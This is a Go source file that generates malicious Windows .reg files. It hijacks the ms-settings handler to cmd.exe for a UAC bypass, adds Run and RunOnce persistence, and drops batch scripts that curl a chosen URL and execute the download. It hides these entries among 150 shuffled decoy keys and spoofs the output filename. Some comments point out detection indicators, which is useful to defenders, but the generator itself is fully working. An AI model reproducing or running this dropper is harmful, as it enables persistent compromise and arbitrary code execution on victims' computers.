path: root/cmd/_skidcode/e621_reg_dropper/main.go
blob: c9b861991576e7f507a532281dd4463299e89ab5 (plain)
package main

import (
	"fmt"
	"io/ioutil"
	"log"
	"math/rand"
	"os"
	"strings"
	"time"
)

// main generates a Windows Registry Editor 5.00 (.reg) file from the command line.
//
// Positional arguments (os.Args[1:]):
//   direct_link          URL embedded in a curl command inside the generated batch script
//   output               base name of the .reg file; ".reg" is appended
//   spoofed_message      optional text spliced into the output filename (see below)
//   extra_registry_keys  optional; decoy sections are generated only when this is "true" (default true)
//
// If imported, the file (1) points the HKCU ms-settings class handler at cmd.exe
// with an empty DelegateExecute value, (2) adds two HKCU Run values that create
// and chain batch files under %temp% and c:\Users\public, and (3) adds a RunOnce
// value that launches the public batch file; the author's own name for that
// value (uacTrigger) states the intent. Decoy sections are mixed in and all
// sections are shuffled. For detection, the fixed key paths and file locations
// above are the stable indicators; the random names are not.
func main() {
	commandArgs := os.Args
	if len(commandArgs) < 3 {
		log.Fatalf("Usage: %s <direct_link> <output> </spoofed_message> </extra_registry_keys>", commandArgs[0])
	}

	directDownloadLink := commandArgs[1]
	outputFilename := commandArgs[2]

	spoofedMessage := ""
	generateExtraKeys := true

	// Only argument counts of exactly 4 or 5 are recognised; any further
	// arguments are ignored without a warning.
	if len(commandArgs) == 4 {
		spoofedMessage = commandArgs[3]
	}
	if len(commandArgs) == 5 {
		spoofedMessage = commandArgs[3]
		generateExtraKeys = (commandArgs[4] == "true")
	}

	// Splices "%n%n<message>%n%0" into the output *filename*, not the file body.
	// NOTE(review): what these % sequences are meant to do is not evident from this file.
	if spoofedMessage != "" {
		outputFilename += fmt.Sprintf("%%n%%n%s%%n%%0", spoofedMessage)
	}

	outputFilename += ".reg"

	// Each section is one "[key]" header line followed by its value lines.
	sections := make([][]string, 0)

	// Random names reused for the Run/RunOnce value names and the dropped .bat
	// files. GenerateRandomString reseeds the shared math/rand source from the
	// wall clock on every call, so no uniqueness between the two is guaranteed.
	randomIdentifier := GenerateRandomString(8)
	secondaryRandomIdentifier := GenerateRandomString(8)

	// Section 1: HKCU ms-settings class handler set to cmd.exe with an empty
	// DelegateExecute value. This key/value pair under HKCU is a high-signal
	// detection indicator.
	sections = append(sections, []string{"[HKEY_CURRENT_USER\\Software\\Classes\\ms-settings\\shell\\open\\command]", "(Default)=\"C:\\Windows\\System32\\cmd.exe\"", "DelegateExecute=\"\""})

	// Lines of the batch script that will be written to %temp%\<randomIdentifier>.bat:
	// it downloads direct_link to %temp%\calc.exe with curl and runs it.
	cmdSequence := []string{
		"echo @echo off",
		fmt.Sprintf("curl %s -o %%temp%%\\calc.exe", directDownloadLink),
		"%temp%\\calc.exe",
		"exit",
	}

	// The Run value does not contain the script itself; it contains a
	// `cmd /c "(echo ... & echo ...)" > %temp%\<id>.bat` command that writes
	// the script at logon. Double quotes are backslash-escaped for .reg syntax.
	cmdOutputStr := "cmd /c \\\"("
	for i, command := range cmdSequence {
		if i > 0 {
			cmdOutputStr += " & "
		}
		cmdOutputStr += fmt.Sprintf("echo %s", command)
	}
	cmdOutputStr += fmt.Sprintf(")\\\" > %%temp%%\\%s.bat", randomIdentifier)

	// Run value 1 writes the %temp% script; Run value 2 appends a
	// `start /min cmd /c %temp%\<id>.bat` line to c:\Users\public\<id>.bat.
	registryKeyStr := fmt.Sprintf("\"%s\"=\"%s\"", randomIdentifier, cmdOutputStr)
	secondaryRegistryKeyStr := fmt.Sprintf("\"%s\"=\"cmd /c echo start /min cmd /c %%temp%%\\%s.bat >> c:\\Users\\public\\%s.bat\"", secondaryRandomIdentifier, randomIdentifier, randomIdentifier)

	// Section 2: HKCU Run persistence carrying both values above.
	sections = append(sections, []string{"[HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]", registryKeyStr, secondaryRegistryKeyStr})

	// Section 3: HKCU RunOnce value that launches the public batch file once.
	uacTrigger := fmt.Sprintf("\"%s\"=\"c:\\Users\\public\\%s.bat\"", randomIdentifier, randomIdentifier)
	sections = append(sections, []string{"[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce]", uacTrigger})

	// Decoy sections (150 by default) are appended so the three live sections
	// are buried among plausible-looking noise.
	fakeRegistrySections := make([][]string, 0)

	if generateExtraKeys {
		fakeRegistrySections = generateFakeRegistrySections(150)
	}

	sections = append(sections, fakeRegistrySections...)

	// Reseed the shared generator and permute section order so the live
	// sections do not sit at a fixed offset in the file.
	rand.Seed(time.Now().UnixNano())
	rand.Shuffle(len(sections), func(i, j int) { sections[i], sections[j] = sections[j], sections[i] })

	// Flatten to lines with one blank line after every section.
	allLines := make([]string, 0)
	for _, section := range sections {
		allLines = append(allLines, section...)
		allLines = append(allLines, "")
	}

	// CRLF line endings and the standard header make the output importable by
	// regedit. NOTE(review): ioutil.WriteFile is deprecated in favour of
	// os.WriteFile, and the returned error is discarded, so a failed write is
	// not reported.
	ioutil.WriteFile(outputFilename, []byte("Windows Registry Editor Version 5.00\r\n"+strings.Join(allLines, "\r\n")), 0644)
}

// GenerateRandomString returns a string of exactly length bytes drawn from
// [a-zA-Z0-9]. The shared math/rand source is reseeded from the wall clock on
// every call, so two calls within the same clock tick yield the same string.
// A negative length panics, as the underlying make does.
func GenerateRandomString(length int) string {
	const alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
	rand.Seed(time.Now().UnixNano())

	out := make([]byte, 0, length)
	for i := 0; i < length; i++ {
		out = append(out, alphabet[rand.Intn(len(alphabet))])
	}
	return string(out)
}

// generateFakeRegistrySections returns numSections decoy sections used to pad
// the generated .reg file. Each section is a header of the form
// "[<prefix><random 8 chars>]" followed by one value line
// "\"<random 8 chars>\"=\"<random 9 chars>\"".
//
// Detection note: every prefix below already ends in a backslash and the
// header format adds another, so decoy headers contain a doubled backslash
// immediately before the random subkey name; together with the fixed 8/9
// character value shape this is a fingerprint of the generator itself.
func generateFakeRegistrySections(numSections int) [][]string {
	// Plausible-looking HKCU/HKLM prefixes under which random subkeys are invented.
	fakeRegistryKeys := []string{
		"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\",
		"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\",
		"HKEY_CURRENT_USER\\Control Panel\\Desktop\\",
		"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\",
		"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\",
		"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",
		"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\",
		"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\AppID\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\CLSID\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\TypeLib\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\AppID\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden\\",
		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden\\SHOWALL\\",
	}

	fakeRegistrySections := make([][]string, 0)

	// rand.Intn draws from the shared source, which every GenerateRandomString
	// call reseeds from the wall clock; a non-positive numSections yields an
	// empty (non-nil) result.
	for i := 0; i < numSections; i++ {
		section := []string{}
		section = append(section, fmt.Sprintf("[%s\\%s]", fakeRegistryKeys[rand.Intn(len(fakeRegistryKeys))], GenerateRandomString(8)))
		section = append(section, fmt.Sprintf("\"%s\"=\"%s\"", GenerateRandomString(8), GenerateRandomString(9)))
		fakeRegistrySections = append(fakeRegistrySections, section)
	}

	return fakeRegistrySections
}